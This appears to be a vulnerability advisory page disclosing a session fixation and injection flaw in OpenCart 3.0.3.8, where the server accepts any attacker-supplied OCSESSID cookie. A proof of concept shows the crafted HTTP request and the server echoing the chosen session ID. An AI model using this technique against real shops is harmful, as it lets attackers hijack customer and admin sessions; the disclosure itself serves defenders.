Opencart 3.0.3.8 Session Injection

2021.11.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: opencart 3.0.3.8 - Sessjion Injection # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/ # Version: 3.0.3.8 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Sessjion Fixation / injection Session cookie "OCSESSID" is inproperly processed Attacker can set any value cookie and server set this value Becouse of that sesssion injection and session fixation vulnerability ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example Modify cookie "OCSESSID" value: ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1/opencart-3.0.3.8/ Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Server set atttacker value: Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 15:16:06 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: PHP/8.0.11 Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18944 [...]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top